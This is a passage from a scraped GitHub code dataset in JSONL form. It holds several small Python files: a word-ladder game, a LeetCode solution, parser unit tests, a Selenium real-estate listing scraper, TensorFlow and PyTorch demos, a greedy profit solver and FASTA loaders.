in each):\n            continue\n        else:\n            four_letter_words.append(each)\n\nfour_letter_words = [x.lower() for x in four_letter_words]\n\n########################################\n# Gets a random, valid, 4 letter word\ndef randomword(words):\n    # randint is inclusive on both ends, so cap the index at len(words) - 1\n    word = words[random.randint(0, len(words) - 1)]\n    return word\n\n###########################################\n# Verifies the input has 4 letters\ndef fourletters(input_word):\n    if(len(input_word) != 4):\n        return False\n    else:\n        return True\n###########################################\n# Verifies there is only 1 difference in the input word\ndef differences(input_word, prev_word):\n    diff = 0\n    counter = 0\n\n    while(counter < 4):\n        if(input_word[counter] != prev_word[counter]):\n            diff = diff + 1\n\n        counter = counter + 1\n\n    if(diff > 1):\n        return False\n    else:\n        return True\n##########################################\n# Verifies the input is valid\ndef dictionarycheck(input_word, dictionary):\n    verified = False\n    for each in dictionary:\n        if(input_word == each):\n            verified = True\n\n    return verified\n###########################################\n# Handles gameplay\ndef gameplay(prev_word, final_word, dictionary):\n    input_word = input(\"Please enter a word: \")\n    if(fourletters(input_word) == False):\n        print(\"Please enter a valid word\" + '\\n')\n        print(\"Previous word was: \" + prev_word)\n        return gameplay(prev_word, final_word, dictionary)\n\n    if(differences(input_word, prev_word) == False):\n        print(\"Please enter a valid word\" + '\\n')\n        print(\"Previous word was: \" + prev_word)\n        return gameplay(prev_word, final_word, dictionary)\n\n    if(dictionarycheck(input_word, dictionary) == False):\n        print(\"Please enter a valid word\" + '\\n')\n        print(\"Previous word was: \" + prev_word)\n        return gameplay(prev_word, final_word, dictionary)\n\n    if(input_word == final_word):\n        print(\"You did it! 
Congratulations\")\n else:\n gameplay(input_word, final_word, dictionary)\n\n###########################################\n#game starts\nstartword = randomword(four_letter_words)\nfinalword = randomword(four_letter_words)\n\nprint(\"This is your starting word: \" + startword)\nprint(\"This is your final word: \" + finalword)\n\ngameplay(startword, finalword, four_letter_words)\n","repo_name":"spetsnazzy/Word-Game","sub_path":"Word_Game.py","file_name":"Word_Game.py","file_ext":"py","file_size_in_byte":2740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70287406312","text":"#\n# @lc app=leetcode id=804 lang=python3\n#\n# [804] Unique Morse Code Words\n#\n\n# @lc code=start\nfrom typing import List\n\n\nclass Solution:\n def uniqueMorseRepresentations(self, words: List[str]) -> int:\n morse = [\".-\", \"-...\", \"-.-.\", \"-..\", \".\", \"..-.\", \"--.\", \"....\", \"..\", \".---\", \"-.-\", \".-..\", \"--\",\n \"-.\", \"---\", \".--.\", \"--.-\", \".-.\", \"...\", \"-\", \"..-\", \"...-\", \".--\", \"-..-\", \"-.--\", \"--..\"]\n transformations = set()\n\n for word in words:\n transformation = ''.join(morse[ord(c) - ord('a')] for c in word)\n transformations.add(transformation)\n\n return len(transformations)\n# @lc code=end\n\n","repo_name":"MegaBlackLabel/leetcode","sub_path":"804.unique-morse-code-words.py","file_name":"804.unique-morse-code-words.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70973298473","text":"from unittest import TestCase\r\nfrom mock import MagicMock, patch\r\nfrom presto_types_parser.src.complex_column_process.map_processor_builder import \\\r\n build_map_processor, extract_inner_type_signatures\r\n\r\n\r\nclass TestPrestoMapProcessorBuilder(TestCase):\r\n map_type_signature = {\r\n \"rawType\": \"map\",\r\n \"arguments\": [\r\n {\r\n \"kind\": \"TYPE\",\r\n \"value\": {\r\n \"rawType\": \"varchar\",\r\n \"arguments\": [\r\n {\r\n \"kind\": \"LONG\",\r\n \"value\": 2147483647\r\n }\r\n ]\r\n }\r\n },\r\n {\r\n \"kind\": \"TYPE\",\r\n \"value\": {\r\n \"rawType\": \"varchar\",\r\n \"arguments\": [\r\n {\r\n \"kind\": \"LONG\",\r\n \"value\": 2147483647\r\n }\r\n ]\r\n }\r\n }\r\n ]\r\n }\r\n\r\n def test_given_map_type_signature_should_return_the_type_signature_that_presents_the_values(\r\n self):\r\n expected_inner_types_signatures = [{\r\n \"rawType\": \"varchar\",\r\n \"arguments\": [\r\n {\r\n \"kind\": \"LONG\",\r\n \"value\": 2147483647\r\n }\r\n ]\r\n }]\r\n\r\n self.assertEqual(\r\n expected_inner_types_signatures,\r\n extract_inner_type_signatures(self.map_type_signature)\r\n )\r\n\r\n @patch(\"presto_types_parser.src.complex_column_process.map_processor_builder.\"\r\n \"new_map_process_function\")\r\n def test_when_build_cell_processor_should_return_map_processor_with_match_value_processor(\r\n self, mocked_new_process_function):\r\n mocked_cell_processor = MagicMock()\r\n\r\n process_row = build_map_processor(self.map_type_signature, [mocked_cell_processor])\r\n\r\n mocked_new_process_function.assert_called_once_with(\r\n mocked_cell_processor,\r\n 'varchar'\r\n )\r\n\r\n 
self.assertTrue(callable(process_row))\r\n","repo_name":"ofekby/presto-types-parser","sub_path":"presto_types_parser/tests/complex_column_process/test_map_processor_builder.py","file_name":"test_map_processor_builder.py","file_ext":"py","file_size_in_byte":2197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12366701337","text":"# packages\nimport os\nimport re\nimport time\nimport pytz\nimport datetime\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.common.exceptions import (\n NoSuchElementException,\n StaleElementReferenceException,\n TimeoutException\n )\nfrom selenium.webdriver.common.action_chains import ActionChains\n\n# other modules\nfrom dotenv import load_dotenv\nfrom driver_manager import WebDriverManager\n\n# own packages\nimport database_app\nimport functions\n\n# get data from .env file\nload_dotenv()\n\n# variables\ndriver = WebDriverManager.get_driver()\nactions = ActionChains(driver)\nurl_immo_website = os.environ[\"URL_IMMO_WEBSITE_BI\"]\ncity_researched_content = os.environ[\"CITY_RESEARCHED_CONTENT\"]\ncurrent_time_utc = datetime.datetime.now(tz=pytz.utc).timestamp()\nfunctions = functions\n\n\n# functions\ndef check_accept_section(cssSelector: str):\n\n driver.implicitly_wait(5)\n try:\n accept = WebDriverWait(driver, 5).until(\n EC.element_to_be_clickable((By.CSS_SELECTOR, cssSelector))\n )\n accept.click()\n except (\n NoSuchElementException,\n StaleElementReferenceException,\n TimeoutException\n ):\n print(\"KO : no accept part\")\n\n\ndef add_new_announces():\n\n global_page_number = 2\n\n print(\"------------------Add_new_annouces_Start------------------\")\n # connection to website\n driver.get(url_immo_website)\n driver.implicitly_wait(5)\n # check an agree the terms section exists\n time.sleep(2)\n check_accept_section('span.didomi-continue-without-agreeing')\n time.sleep(2)\n\n # fill research section\n search_input = driver.find_element(By.CSS_SELECTOR, \"input.tt-input\")\n search_input.send_keys(os.environ[\"CITY_RESEARCHED\"])\n time.sleep(2)\n\n # select desired town in the dropdown menu\n try:\n dropdown_element = driver.find_elements(By.CSS_SELECTOR, \"div.suggestionItem\")[0]\n time.sleep(2)\n actions.click(dropdown_element).perform()\n except (NoSuchElementException, StaleElementReferenceException, TimeoutException):\n print(\"KO : unable to make the dropdown menu appear\")\n\n # click on the search button\n time.sleep(2)\n driver.find_element(By.CSS_SELECTOR, \"button.btn.btn-primary.search\").click()\n annonce = 0\n\n while True:\n try:\n next_results_btn = driver.find_element(\n By.CSS_SELECTOR, \"a.btn.goForward.btn-primary.pagination__go-forward-button\"\n )\n except (NoSuchElementException):\n print(\"KO : no more next button\")\n break\n\n try:\n articles = driver.find_elements(\n By.CSS_SELECTOR, \"article.sideListItem\"\n )\n print(f\"------------------Page_Start {global_page_number-1}------------------\")\n print(\"articles\", articles)\n for article in articles:\n print(f\"{article} {annonce}\")\n annonce += 1\n print(\"------------------Article Start------------------\")\n print(\"article :\", article)\n\n # type of property\n type_of_property = \"\"\n try:\n type_of_property_content = article.find_element(\n By.CSS_SELECTOR, \"span.ad-overview-details__ad-title\"\n )\n type_of_property_content = type_of_property_content.text\n if \"maison\" in 
type_of_property_content.lower():\n type_of_property = \"maison\"\n elif \"appartement\" in type_of_property_content.lower():\n type_of_property = \"appartement\"\n else:\n type_of_property = \"\"\n print(\"type_of_property :\", type_of_property)\n\n except (NoSuchElementException):\n print(\"KO : no data for type_of_property found\")\n\n # town\n town = os.environ[\"CITY_RESEARCHED\"]\n print(\"town :\", town)\n\n # District&&Postcode\n district = \"\"\n postcode = 0\n try:\n address_content = article.find_element(\n By.CSS_SELECTOR, \"span.ad-overview-details__address-title\"\n )\n address_content = address_content.text\n # district\n try:\n district = re.findall(r\"\\((.*?)\\)\", address_content)[0]\n except IndexError:\n print(\"KO : no data for District found\")\n district = \"\"\n # postcode\n try:\n postcode = re.findall(r\"[0-9]*\", address_content)[0]\n except IndexError:\n print(\"KO : no data for Postcode found\")\n postcode = 0\n print(\"district :\", district)\n print(\"postcode :\", postcode)\n\n except (NoSuchElementException):\n print(\"KO : no data for District&&Postcode found\")\n\n # url\n url = \"\"\n try:\n url_content = article.find_element(By.CSS_SELECTOR, \"a.detailedSheetLink\")\n url = url_content.get_attribute('href')\n print(\"link :\", url)\n except (NoSuchElementException):\n print(\"KO : no data for url found\")\n\n # room number && surface\n surface = 0\n room_number = 0\n try:\n room_surface_content = article.find_element(\n By.CSS_SELECTOR, \"span.ad-overview-details__ad-title\"\n )\n content_text = room_surface_content.text\n # room\n room_number = room_surface_content.text\n pattern_room = r'(\\d+)\\s*pièce'\n room_content = re.findall(pattern_room, content_text)\n room_number = room_content[0]\n print(\"room_number :\", room_number)\n # surface\n surface = room_surface_content.text\n pattern_squaremeters = r'\\b(\\d+)\\b'\n surface_content = re.findall(pattern_squaremeters, content_text)\n surface = surface_content[-1]\n print(\"surface :\", surface)\n except (NoSuchElementException):\n print(\"KO : no data for room number && surface found\")\n\n # price\n price = 0\n try:\n price_content = article.find_element(By.CSS_SELECTOR, \"span.ad-price__the-price\")\n price_content = price_content.text\n price = ''.join(re.findall(r'\\d+', price_content))\n if len(price) > 7:\n price = None\n print(\"price :\", price)\n except (NoSuchElementException):\n print(\"KO : no data for price found\")\n\n # date\n date_add_to_db = current_time_utc\n print(\"date_add_to_db :\", date_add_to_db)\n\n print(\"------------------Article End------------------\")\n\n # add properties to db\n if not database_app.get_property_by_url(url):\n property_id = database_app.add_property(\n type_of_property,\n town,\n district,\n postcode,\n url,\n room_number,\n surface,\n date_add_to_db\n )\n database_app.add_price_to_property(date_add_to_db, property_id, price)\n\n # catch data to access the next page\n next_page_url = next_results_btn.get_attribute('href')\n print(\"next_page_url\", next_page_url)\n pattern_next_page_url_without_page = r\"(.+)\\?\"\n next_page_url_without_page = re.findall(pattern_next_page_url_without_page, next_page_url)[0]\n print(\"next_page_url_without_page :\", next_page_url_without_page)\n driver.get(next_page_url)\n global_page_number += 1\n print(\"------------------Add_new_annouces_End------------------\")\n except Exception as e:\n print(f\"An error occurred while processing the current page: {e}\")\n\n\ndef add_descriptions():\n 
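# For each property URL stored by add_new_announces, open its detail page and scrape the description fields into the database.\n    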
print(\"------------------DESCRIPTION PART------------------\")\n # Add description to database\n property_urls = database_app.get_id_url_from_properties()\n\n for id_property, url_property in property_urls:\n\n print(f\"------------------Start add description {id_property}------------------\")\n print(\"url_property\", url_property)\n # check if the property has or not a description linked\n if not database_app.get_property_description_by_id(id_property):\n\n driver.get(url_property)\n driver.implicitly_wait(5)\n\n # check if a agreeing pop-up displays\n check_accept_section('span.didomi-continue-without-agreeing')\n driver.implicitly_wait(5)\n\n # check if the announce is still available\n try:\n outOfTheMarket = driver.find_element(By.CLASS_NAME, \"outOfTheMarketBanner\")\n print(f\"KO : Announce no more available {outOfTheMarket}\")\n database_app.delete_property(id_property)\n continue\n except (NoSuchElementException):\n print(\"OK : Announce still available\")\n\n labelsInfo = driver.find_elements(By.CSS_SELECTOR, \"div.labelInfo\")\n\n # default values\n # building options\n year_of_construction = \"\"\n exposition = \"\"\n floor = None\n total_floor_number = None\n neighborhood_description = \"\"\n\n # rooms\n bedroom_number = 0\n toilet_number = 0\n bathroom_number = 0\n cellar = False\n lock_up_garage = False\n\n # options indoor\n heating = \"\"\n tv_cable = False\n fireplace = False\n digicode = False\n intercom = False\n elevator = False\n fibre_optics_status = \"\"\n\n # options outdoor\n garden = False\n car_park_number = 0\n balcony = False\n large_balcony = False\n\n # administration\n estate_agency_fee_percentage = 0\n pinel = False\n denormandie = False\n announce_publication = \"\"\n announce_last_modification = current_time_utc\n\n # diagnostics\n dpe_date = \"\"\n energetic_performance_letter = None\n energetic_performance_number = 0\n climatic_performance_number = 0\n climatic_performance_letter = None\n\n regex_find_numbers = r'\\d+'\n regex_find_text_after_colon = r':\\s*([^:,]+)'\n\n driver.implicitly_wait(5)\n for labelInfo in labelsInfo:\n try:\n element = labelInfo.find_element(By.CSS_SELECTOR, \"span\")\n element_text = element.text.lower()\n\n # year_of_construction\n if \"construit\" in element_text:\n year_of_construction = re.findall(regex_find_numbers, element_text)[0]\n format_string_construction = \"%Y\"\n local_timestamp_construction = datetime.datetime.strptime(\n year_of_construction,\n format_string_construction\n )\n year_of_construction = local_timestamp_construction.replace(\n tzinfo=pytz.timezone('UTC')\n ).timestamp()\n\n # exposition\n elif \"exposé\" in element_text:\n pattern_exposition = r'exposé\\s(.+)'\n exposition = re.findall(pattern_exposition, element_text)[0]\n\n # floor\n # total_floor_number\n elif \"étage\" in element_text:\n pattern_floor = r'^[0-9]+'\n pattern_floor_number = r'sur\\s+(\\d+)'\n\n if \"dernier\" in element_text:\n floor = total_floor_number\n else:\n floor = int(re.findall(pattern_floor, element_text)[0])\n\n if \"sur\" in element_text:\n total_floor_number = int(re.findall(pattern_floor_number, element_text)[0])\n else:\n total_floor_number = None\n\n # bedroom_number\n elif \"chambre\" in element_text:\n bedroom_number = re.findall(regex_find_numbers, element_text)[0]\n\n # toilet_number\n elif \"wc\" in element_text:\n if \"séparé\" in element_text:\n continue\n else:\n toilet_number = re.findall(regex_find_numbers, element_text)[0]\n\n # bathroom_number\n elif \"bain\" in element_text:\n bathroom_number = 
re.findall(regex_find_numbers, element_text)[0]\n\n                    # cellar\n                    elif \"cave\" in element_text:\n                        cellar = True\n\n                    # lock_up_garage\n                    elif \"box\" in element_text:\n                        lock_up_garage = True\n\n                    # heating\n                    elif \"chauffage\" in element_text:\n                        heating = re.findall(regex_find_text_after_colon, element_text)[0]\n\n                    # tv_cable\n                    elif \"tv\" in element_text:\n                        tv_cable = True\n\n                    # fireplace\n                    elif \"cheminée\" in element_text:\n                        fireplace = True\n\n                    # digicode\n                    elif \"digicode\" in element_text:\n                        digicode = True\n\n                    # intercom\n                    elif \"interphone\" in element_text:\n                        intercom = True\n\n                    # elevator\n                    elif \"ascenseur\" in element_text:\n                        elevator = True\n\n                    # fibre_optics_status\n                    elif \"fibre\" in element_text:\n                        fibre_optics_status = re.findall(\n                            regex_find_text_after_colon,\n                            element_text\n                        )[0].replace(\"*\", \"\")\n\n                    # garden\n                    elif \"jardin\" in element_text:\n                        garden = True\n\n                    # car_park_number\n                    elif \"parking\" in element_text:\n                        if functions.contains_numbers(element_text) is True:\n                            car_park_number = re.findall(regex_find_numbers, element_text)[0]\n                        else:\n                            car_park_number = None\n\n                    # balcony\n                    elif \"balcon\" in element_text:\n                        balcony = True\n\n                    # large_balcony\n                    elif \"terrasse\" in element_text:\n                        large_balcony = True\n\n                    # estate_agency_fee_percentage\n                    # elif \"honoraires :\" in element_text:\n                    #     pattern = r'[\\d,]+%'\n                    #     estate_agency_fee_percentage = re.findall(\n                    #         pattern,\n                    #         element_text\n                    #     )[0].replace(\"%\", \"\")\n\n                    # pinel\n                    elif \"pinel\" in element_text:\n                        pinel = True\n\n                    # denormandie\n                    elif \"denormandie\" in element_text:\n                        denormandie = True\n\n                    # announce_publication\n                    elif \"publiée\" in element_text:\n                        if \"il y a plus\" in element_text:\n                            announce_publication = None\n                        else:\n                            publication_french_date = re.findall(r'le\\s(.+)', element_text)[0]\n                            announce_publication = functions.date_converter_french_date_to_utc_timestamp(\n                                publication_french_date\n                            )\n\n                    # announce_last_modification\n                    elif \"modifiée\" in element_text:\n                        modification_french_date = re.findall(r'le\\s(.+)', element_text)[0]\n                        announce_last_modification = functions.date_converter_french_date_to_utc_timestamp(\n                            modification_french_date\n                        )\n\n                    # dpe_date\n                    elif \"dpe\" in element_text:\n                        dpe_french_date = re.findall(regex_find_text_after_colon, element_text)[0]\n                        dpe_date = functions.date_converter_french_date_to_utc_timestamp(dpe_french_date)\n\n                    # batch\n                    # elif \"lot\" in element_text:\n                    #     batch = re.findall(regex_find_numbers, element_text)[0]\n\n                    else:\n                        continue\n\n                except (NoSuchElementException, StaleElementReferenceException):\n                    print(\"KO : no data elements found\")\n\n            # neighborhood_description\n            try:\n                neighborhood_description = driver.find_element(\n                    By.CSS_SELECTOR,\n                    \"div.neighborhoodDescription span\"\n                )\n                neighborhood_description = neighborhood_description.text\n            except (NoSuchElementException, StaleElementReferenceException):\n                print(\"KO : no data for neighborhood_description\")\n\n            # energetic_performance_letter\n            try:\n                energetic_performance_letter = driver.find_element(\n                    By.CSS_SELECTOR,\n                    \"div.dpe-line__classification span div\"\n                )\n                energetic_performance_letter = energetic_performance_letter.text\n            except (NoSuchElementException, StaleElementReferenceException):\n                print(\"KO : no data for energetic_performance_letter\")\n\n            # energetic_performance_number && climatic_performance_number\n            try:\n                dpe_data_numbers = driver.find_elements(\n                    By.CSS_SELECTOR,\n                    \"div.dpe-data div.value span\"\n                )\n                if dpe_data_numbers:\n                    if dpe_data_numbers[0].text == \"-\":\n                        
energetic_performance_number = None\n                else:\n                    energetic_performance_number = int(dpe_data_numbers[0].text)\n\n                if dpe_data_numbers[1].text == \"-\":\n                    climatic_performance_number = None\n                else:\n                    climatic_performance_number = int(dpe_data_numbers[1].text.replace(\"*\", \"\"))\n\n        except (NoSuchElementException, StaleElementReferenceException):\n            print(\"KO : no data for energetic_performance_number\")\n\n        # climatic_performance_letter\n        try:\n            climatic_performance_letter = driver.find_element(By.CSS_SELECTOR,\n                                                              \"div.ges-line__classification span\"\n                                                              )\n            climatic_performance_letter = climatic_performance_letter.text\n        except (NoSuchElementException, StaleElementReferenceException):\n            print(\"KO : no data for climatic_performance_letter\")\n\n        print(\"------------------Description Part End------------------\")\n        print(\"--------------------------------------------------------\")\n        print(\"----------------------Agency Part-----------------------\")\n\n        # estate_agency\n        estate_agency_name = \"\"\n        estate_agency_address = \"\"\n        estate_agency_evaluation = \"\"\n\n        # name\n        try:\n            estate_agency_name = driver.find_element(By.CSS_SELECTOR,\n                                                     \"div.agency-overview__info-name\"\n                                                     )\n            estate_agency_name = estate_agency_name.text\n        except (NoSuchElementException, StaleElementReferenceException):\n            print(\"KO : no data for estate_agency name \")\n            estate_agency_name = None\n\n        # address\n        try:\n            estate_agency_address = driver.find_element(By.CSS_SELECTOR,\n                                                        \"\"\"div.agency-overview__contact-address\n                                                        div.contact-address\"\"\"\n                                                        )\n            estate_agency_address = estate_agency_address.text\n\n        except (NoSuchElementException, StaleElementReferenceException):\n            print(\"KO : no data for estate_agency address\")\n            estate_agency_address = None\n\n        # fee_percentage\n        # value caught above\n\n        # evaluation\n        try:\n            estate_agency_evaluation = driver.find_element(\n                By.CSS_SELECTOR,\n                \"span.rating-stars__rating-text\"\n            )\n            estate_agency_evaluation = estate_agency_evaluation.text\n        except (NoSuchElementException, StaleElementReferenceException):\n            print(\"KO : no data for estate_agency evaluation\")\n            estate_agency_evaluation = None\n\n        print(\"estate_agency_name\", estate_agency_name)\n        print(\"estate_agency_address\", estate_agency_address)\n        print(\"estate_agency_fee_percentage\", estate_agency_fee_percentage)\n        print(\"estate_agency_evaluation\", estate_agency_evaluation)\n\n        result = database_app.get_agency_by_name(estate_agency_name)\n        print(\"result\", result)\n\n        if not result or estate_agency_name is None:\n            print(\"stepagency1\")\n            database_app.add_agency(estate_agency_name,\n                                    estate_agency_address,\n                                    estate_agency_fee_percentage,\n                                    estate_agency_evaluation\n                                    )\n            print(\"stepagency2\")\n            print(f\"OK : {estate_agency_name} estate_agency has been added to database\")\n        else:\n            print(\"stepagency3\")\n            print(f\"KO : {estate_agency_name} estate_agency already exists\")\n\n        try:\n            estate_agency_id = database_app.get_agency_id_from_name(estate_agency_name)[0][0]\n        except IndexError:\n            estate_agency_id = None\n\n        print(\"estate_agency_id\", estate_agency_id)\n        print(\"------------------Agency Part End------------------\")\n\n        print(f\"------------------Add Description {id_property}------------------\")\n        print(\"#############RECAP ANNOUNCE VARIABLES#############\")\n        print(\"year_of_construction :\", year_of_construction)\n        print(\"exposition :\", exposition)\n        print(\"floor :\", floor)\n        print(\"total_floor_number :\", total_floor_number)\n
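# the recap continues below with the remaining scraped fields, in the same order they are passed to add_description\n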
print(\"neighborhood_description :\", neighborhood_description)\n print(\"bedroom_number :\", bedroom_number)\n print(\"toilet_number :\", toilet_number)\n print(\"bathroom_number :\", bathroom_number)\n print(\"cellar :\", cellar)\n print(\"lock_up_garage :\", lock_up_garage)\n print(\"heating :\", heating)\n print(\"tv_cable :\", tv_cable)\n print(\"fireplace :\", fireplace)\n print(\"digicode :\", digicode)\n print(\"intercom :\", intercom)\n print(\"elevator :\", elevator)\n print(\"fibre_optics_status :\", fibre_optics_status)\n print(\"garden :\", garden)\n print(\"car_park_number :\", car_park_number)\n print(\"balcony :\", balcony)\n print(\"large_balcony :\", large_balcony)\n print(\"dpe_date :\", dpe_date)\n print(\"estate_agency_fee_percentage :\", estate_agency_fee_percentage)\n print(\"pinel :\", pinel)\n print(\"denormandie :\", denormandie)\n print(\"announce_publication :\", announce_publication)\n print(\"announce_last_modification :\", announce_last_modification)\n print(\"energetic_performance_letter :\", energetic_performance_letter)\n print(\"energetic_performance_number :\", energetic_performance_number)\n print(\"climatic_performance_number :\", climatic_performance_number)\n print(\"climatic_performance_letter :\", climatic_performance_letter)\n\n database_app.add_description(id_property,\n year_of_construction,\n exposition,\n floor,\n total_floor_number,\n neighborhood_description,\n bedroom_number,\n toilet_number,\n bathroom_number,\n cellar,\n lock_up_garage,\n heating,\n tv_cable,\n fireplace,\n digicode,\n intercom,\n elevator,\n fibre_optics_status,\n garden,\n car_park_number,\n balcony,\n large_balcony,\n estate_agency_fee_percentage,\n pinel,\n denormandie,\n announce_publication,\n announce_last_modification,\n dpe_date,\n energetic_performance_letter,\n energetic_performance_number,\n climatic_performance_number,\n climatic_performance_letter,\n estate_agency_id\n )\n\n print(\"------------------End Add Description------------------\")\n\n else:\n print(f\"OK : property {id_property} already has a description\")\n","repo_name":"jeanlouisHERVE/IMMO-SCRAPER","sub_path":"modules/add_announces.py","file_name":"add_announces.py","file_ext":"py","file_size_in_byte":31187,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"15747678769","text":"#!/usr/bin/env python3\n# coding=utf-8\n\nimport tensorflow as tf\n\nwith tf.Graph().as_default(), tf.Session() as sess:\n a = tf.constant([5, 3, 2, 7, 1, 4])\n b = tf.constant([4, 6, 3])\n print('a = \\n%s' % a.eval())\n print('b = \\n%s' % b.eval())\n reshaped_a = tf.reshape(a, [2, 3])\n reshaped_b = tf.reshape(b, [3, 1])\n print('ra = \\n%s' % reshaped_a.eval())\n print('rb = \\n%s' % reshaped_b.eval())\n c = tf.matmul(reshaped_a, reshaped_b)\n print('c = \\n%s' % c.eval())\n\nwith tf.Graph().as_default(), tf.Session() as sess:\n dice1 = tf.Variable(tf.random_uniform([10, 1],\n minval=1, maxval=7,\n dtype=tf.int32))\n dice2 = tf.Variable(tf.random_uniform([10, 1],\n minval=1, maxval=7,\n dtype=tf.int32))\n\n dice_sum = tf.add(dice1, dice2)\n\n resulting_matrix = tf.concat(\n values=[dice1, dice2, dice_sum], axis=1)\n\n sess.run(tf.global_variables_initializer())\n\n print('result = \\n%s' % 
resulting_matrix.eval())\n","repo_name":"qianhk/FeiPython","sub_path":"Python3Test/tensorfly/google_research.py","file_name":"google_research.py","file_ext":"py","file_size_in_byte":1113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36552910800","text":"import matplotlib.pyplot as plt\nimport cv2\nimport numpy as np\nimport time\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nfrom torchvision import models\n\nclass SingleStream(nn.Module):\n \"\"\"Single Stream (Spatial OR Temporal) + LSTM\"\"\"\n def __init__(self):\n super().__init__()\n self.cnn = models.vgg19_bn(pretrained=True)\n num_fts = self.cnn.classifier[3].in_features\n self.cnn.classifier = nn.Sequential(\n *list(self.cnn.classifier.children())[:-4]\n )\n # add lstm layer\n self.lstm = nn.LSTM(num_fts, 512, 2)\n # add linear layer\n self.fc = nn.Linear(512, 4)\n\n def forward(self, inputs):\n \"\"\"Forward pass through network.\n Args:\n inputs (torch.Tensor): tensor of dimensions\n [numSeqs x batchSize x numChannels x Width x Height]\n Returns:\n torch.Tensor: final output of dimensions\n [batchSize x numClasses]\n \"\"\"\n # list to hold features\n feats = []\n # for each input in sequence\n for inp in inputs:\n # pass through cnn\n outs = self.cnn.forward(inp).data\n feats.append(outs)\n \n # format features and store in Variable\n feats = torch.stack(feats)\n feats = Variable(feats)\n # pass through LSTM\n outputs, _ = self.lstm(feats)\n outputs = self.fc(outputs[-1])\n return outputs\n\ncap = cv2.VideoCapture('data/dashcam_test.mp4')\nmean = np.array([0.485, 0.456, 0.406])\nstd = np.array([0.229, 0.224, 0.225])\n\nnet = SingleStream()\nnet = net.cuda()\nprint(net)\n\ninputs_list = [torch.zeros(1,3,224,224) for i in range(20)]\n\ncount = 0\nwhile cap.isOpened():\n start_time = time.time()\n ret, frame = cap.read()\n if ret is False:\n break\n\n # use frame as input\n inp = cv2.resize(frame, (224, 224))\n inp = cv2.cvtColor(inp, cv2.COLOR_BGR2RGB)\n inp = inp / 255\n inp = (inp - mean) / std\n inp = inp.transpose(2,0,1)\n inp = torch.from_numpy(inp).type(torch.FloatTensor)\n inp = inp.unsqueeze(0)\n inputs_list.append(inp)\n inputs_list.pop(0)\n inputs = Variable(torch.stack((inputs_list)).cuda())\n print('inputs:', inputs.shape)\n outputs = net.forward(inputs)\n print('outputs:', outputs.shape)\n _, pred = torch.max(outputs.data, 1)\n cv2.putText(frame, str(pred[0]), (1200,80), cv2.FONT_HERSHEY_SIMPLEX,\n 3, (0,0,255), 4)\n fps = round(1 / (time.time()-start_time), 1)\n print(\"FPS: \", fps)\n cv2.putText(frame, 'fps:' + str(fps), (20,70), cv2.FONT_HERSHEY_SIMPLEX,\n 2, (0,0,255), 3)\n file_name = 'data/images/test_' + str(count) + '.png'\n cv2.imwrite(file_name, frame)\n count += 1\n\nprint('Done')\n","repo_name":"gcorcorann/OnlineAttention","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33012849278","text":"# Read n and p\r\nn, p = input().split()\r\n# Typecast str to int\r\nn = int(n)\r\n# Read the investment prices\r\na = list(map(str, input().split()))[:n]\r\n# Read profit prices\r\nb = list(map(str, input().split()))[:n]\r\n# typecast str to int of investment prices\r\nfor i in range(len(a)):\r\n a[i] = int(a[i][1:])\r\n# typecast str to int of profit\r\nfor i in range(len(b)):\r\n b[i] = int(b[i][1:])\r\n# get totalprofit\r\ntotalProfit = 0\r\n\r\n# available money\r\nmoney = 
int(p[1:])\r\n\r\n# sort the projects according to the investment value\r\nprojectList = []\r\nfor i in range(n):\r\n    # get ith project and append into the project list\r\n    currentProject = []\r\n    currentProject.append(a[i])\r\n    currentProject.append(b[i])\r\n    projectList.append(currentProject)\r\n# sort all projects\r\nprojectList.sort()\r\n\r\nfor i in range(n):\r\n    # if available money is greater than the ith project investment value\r\n    # then get initial money + profit\r\n    # also add the profit into total profit\r\n    if money >= projectList[i][0]:\r\n        money += projectList[i][1]\r\n        totalProfit += projectList[i][1]\r\n\r\n\r\n# Display total Profit\r\ntotalProfit = \"$\"+str(totalProfit)\r\nprint(totalProfit)\r\n\r\n\r\n# Time Complexity: O(n*logn)\r\n# Explanation: sorting requires O(n*logn) time + we take O(n) to iterate over the projects\r\n# Hence the overall time complexity is O(n*logn)","repo_name":"Nilesh1206/mission_faang","sub_path":"Chegg/235_Optimize.py","file_name":"235_Optimize.py","file_ext":"py","file_size_in_byte":1333,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"}
{"seq_id":"72933515113","text":"from __future__ import print_function\nimport os\n\ndef read_fasta_seq(file_handle):\n    ''' generator that reads two lines at a time, yields just the sequence '''\n    first = file_handle.readline()\n    second = file_handle.readline()\n    if not first.startswith(\">\"):\n        print(\"data_load_utils.read_fasta_seq_block error: expected a FASTA line, but got sequence instead\")\n        yield \"barf\"\n    else:\n        yield second.strip().upper()\n    \n\ndef get_test_data_files():\n    data_dir = \"./test_data\"\n    return [os.path.join(data_dir, test_file) for test_file in os.listdir(data_dir) if test_file.endswith(\".fa\")]\n\n\ndef load_data_from_file(filename, trunc=0):\n    test_file = open(filename,'r')\n    lines = test_file.readlines()\n    test_file.close()\n    if trunc == 0:\n        return [seq.strip() for seq in lines if not seq.startswith('>')]\n    else:\n        return [seq.strip()[0:trunc] for seq in lines if not seq.startswith('>')]\n\n","repo_name":"lzamparo/SeqDemote","sub_path":"tests/data_load_utils.py","file_name":"data_load_utils.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
